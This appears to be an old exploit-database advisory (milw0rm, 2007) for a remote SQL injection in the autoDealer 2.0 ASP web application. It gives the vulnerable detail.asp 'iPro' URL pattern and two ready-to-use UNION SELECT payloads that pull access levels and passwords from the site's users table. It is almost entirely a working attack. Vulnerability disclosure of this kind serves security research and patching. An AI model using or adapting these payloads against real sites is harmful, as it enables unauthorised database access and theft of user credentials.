*******************************************************************************
# Title : autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.aspsiteware.com
# $$ : $60.00
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//detail.asp?iPro=[SQL]
Example:
//detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users
//detail.asp?iPro=-1%20union%20select%200,0,U_PASSWORD,0%20from%20users
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-01]